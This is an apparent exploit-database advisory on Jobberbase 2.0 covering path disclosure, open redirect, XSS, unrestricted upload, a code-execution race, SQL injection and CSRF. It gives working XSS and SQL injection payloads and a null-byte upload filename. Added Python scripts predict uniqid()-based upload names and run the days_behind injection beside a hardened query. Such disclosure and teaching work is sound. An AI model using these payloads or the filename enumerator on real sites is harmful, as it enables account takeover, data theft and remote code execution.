ID EXPLOITPACK:1DDE902BE0DC50C4E5C67AC965413325 Type exploitpack Reporter Ross Marks Modified 2016-09-08T00:00:00
Description
Jobberbase 2.0 - Multiple Vulnerabilities
Jobberbase: http://www.jobberbase.com/
Version: 2.0
By Ross Marks: http://www.rossmarks.co.uk
1) Local path disclosure - turning almost any query parameter into an array (name[]=value) makes PHP emit an "Array to string conversion" notice; when display_errors is on, that notice leaks the local path the application is installed under
eg. http://example.com/api/api.php?action=getJobs&type[]=0&category=0&count=5&random=1&days_behind=7&response=js
returns: Array to string conversion in <b>/var/www/jobberbase/_lib/class.Job.php</b>
2) Open redirect - after an application is submitted the user is redirected to whatever the "Referer:" header contained, with no validation, so any URL placed in that header is followed
3) reflected XSS in the username field of the admin login: http://example.com/admin/
eg. "><script>alert(1)</script>
reflected XSS in search: http://example.com/search/|<img src="x" onError="alert(1)">/
4) persistent XSS on the admin backend homepage
create a job and give it the URL:
" onhover="alert(1)
(the double quote closes the unescaped attribute and the rest is written into the tag; note that onhover is not a DOM event, so to actually fire the injected handler use a real one such as onmouseover)
persistent XSS - the category name an admin adds is rendered with no output encoding
5) unrestricted file upload
the CV upload accepts any file type; the stored name is the original name with "_" + uniqid() inserted before the extension
eg. "file.php" becomes "file_<uniqid>.php"
uniqid() is not a secure source of random names: it is derived from the current time (seconds and microseconds), so the stored name is predictable to anyone who knows the server clock
if the server is running an older PHP (before 5.3.4, when filesystem functions stopped accepting paths containing NUL) a null byte truncates the name
ie. a filename of "test.php%00.php" (a literal NUL in the multipart filename, written here as %00) would be stored as "test.php"; the NUL also drops the appended uniqid and extension, so the final name is known
6) code execution race condition:
if the admin has chosen not to store uploaded CVs
they are still moved from /tmp into the web-writable upload directory first and only then unlinked
this leaves a brief window in which an attacker can request http://example.com/uploads/file.php (the stored name carries the uniqid suffix from item 5) before it is deleted
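As an added example for items 5 and 6 (this is not code from the advisory or from Jobberbase), the Python below reproduces PHP's uniqid() so the stored CV name can be enumerated once the server's clock is known to the second from the HTTP Date header. The stem cv, the extension php and the Date value used are placeholders, not values from the advisory.

```python
"""Added example (not Jobberbase code): predicting the uniqid()-based
filename the CV upload assigns.

PHP's uniqid() with no prefix and more_entropy=false is just
sprintf("%08x%05x", seconds, microseconds) of the current time. If the
server's clock is known to the second (the HTTP Date header gives that),
the only unknown in "<stem>_<uniqid>.<ext>" is the microsecond field,
i.e. at most 10**6 candidates per second."""
from email.utils import parsedate_to_datetime


def php_uniqid(sec: int, usec: int) -> str:
    """Reproduce uniqid('', false) for a given time: 8 hex digits of seconds
    followed by 5 hex digits of microseconds (13 characters total)."""
    return f"{sec:08x}{usec:05x}"


def decode_uniqid(value: str) -> tuple:
    """Recover (seconds, microseconds) from a uniqid() string. Useful to
    calibrate the server clock if any stored filename ever leaks (for
    example through a directory listing)."""
    if len(value) != 13:
        raise ValueError("uniqid() without more_entropy is 13 hex chars")
    return int(value[:8], 16), int(value[8:], 16)


def date_header_epoch(date_header: str) -> int:
    """Unix seconds from an HTTP Date header such as
    'Thu, 08 Sep 2016 00:00:00 GMT'."""
    return int(parsedate_to_datetime(date_header).timestamp())


def candidate_names(stem: str, ext: str, sec: int,
                    usec_lo: int = 0, usec_hi: int = 999_999):
    """Yield every stored filename the upload could have received during
    one wall-clock second, in the '<stem>_<uniqid>.<ext>' form the advisory
    describes (stem and ext are placeholders chosen by the caller)."""
    for usec in range(usec_lo, usec_hi + 1):
        yield f"{stem}_{php_uniqid(sec, usec)}.{ext}"


def candidates_for_window(stem: str, ext: str, date_header: str,
                          slack_seconds: int = 1):
    """Yield candidate names for the second named by the response's Date
    header plus `slack_seconds` following seconds (the file may be written
    just after the header is generated). About 10**6 names per second."""
    start = date_header_epoch(date_header)
    for sec in range(start, start + slack_seconds + 1):
        yield from candidate_names(stem, ext, sec)


if __name__ == "__main__":
    # Constructed Date header; the uploaded file was named cv.php.
    header = "Thu, 08 Sep 2016 00:00:00 GMT"
    for name in list(candidates_for_window("cv", "php", header, 0))[:3]:
        print(name)
```

uniqid() with more_entropy=true appends ten more characters from lcg_value(), which is also not a cryptographic generator. The fix for the upload is an extension allow-list, a name from random_bytes(), and storage outside the web root; for item 6 the file should never be placed in a served directory at all.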
7) SQL injection in http://example.com/api/api.php?action=getJobs&type=0&category=0&count=5&random=1&days_behind=7&response=js
the days_behind parameter is injectable
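As an added example (not the project's own code), the following Python shows the days_behind injection against a constructed jobs table and the hardened version beside it. The query shape, the table and the column names are assumptions; sqlite3 stands in for Jobberbase's MySQL so the demonstration runs stand-alone.

```python
"""Added example (not Jobberbase code): why an unvalidated days_behind
breaks the getJobs query, and the fix. The query shape is an assumption:
Jobberbase runs on MySQL and presumably filters with something like
DATE_SUB(NOW(), INTERVAL n DAY); sqlite3 is used here only so the example
runs offline against a constructed jobs table."""
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed sample data: one live recent job, one unapproved recent
    job, and one old job. Only the first should ever be returned by getJobs
    with days_behind=7."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jobs (id INTEGER PRIMARY KEY, title TEXT, "
                 "is_active INTEGER, created_on TEXT)")
    conn.executemany(
        "INSERT INTO jobs (title, is_active, created_on) "
        "VALUES (?, ?, datetime('now', ?))",
        [("Live job", 1, "-1 days"),
         ("Unapproved job", 0, "-1 days"),
         ("Expired job", 1, "-30 days")])
    return conn


def vulnerable_get_jobs(conn, days_behind):
    """The advisory's bug: days_behind is pasted into the SQL text."""
    sql = ("SELECT id, title FROM jobs WHERE is_active = 1 "
           f"AND created_on >= datetime('now', '-{days_behind} days')")
    return conn.execute(sql).fetchall()


def hardened_get_jobs(conn, days_behind):
    """Cast to int, bound it, and pass it as a bound parameter, so the value
    can never change the structure of the query."""
    try:
        days = int(str(days_behind).strip())
    except ValueError:
        raise ValueError("days_behind must be an integer") from None
    if not 0 <= days <= 365:
        raise ValueError("days_behind out of range")
    sql = ("SELECT id, title FROM jobs WHERE is_active = 1 "
           "AND created_on >= datetime('now', ?)")
    return conn.execute(sql, (f"-{days} days",)).fetchall()


def hardened_rejects(conn, days_behind) -> bool:
    """True if the hardened version refuses the value."""
    try:
        hardened_get_jobs(conn, days_behind)
    except ValueError:
        return True
    return False


# Payload that closes the datetime() call and comments out the remainder.
# The trailing space after "--" matters on MySQL, which requires "-- ".
PAYLOAD = "0 days') OR 1=1 -- "


if __name__ == "__main__":
    db = build_demo_db()
    print("legit:", vulnerable_get_jobs(db, "7"))
    print("injected:", vulnerable_get_jobs(db, PAYLOAD))
    print("hardened rejects payload:", hardened_rejects(db, PAYLOAD))
```

With the payload the vulnerable query returns every row, including the unapproved and expired jobs, because the OR 1=1 sits outside the is_active and date conditions; the same break-out would also allow UNION-based reads of other tables on the real MySQL back end.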
** notes **
the admin change-password page does not ask for the old password and has no CSRF token; a single forged POST request changes it
admin passwords are stored as unsalted MD5 hashes
cookies are set without the "Secure" or "HttpOnly" flags
no CSRF protection anywhere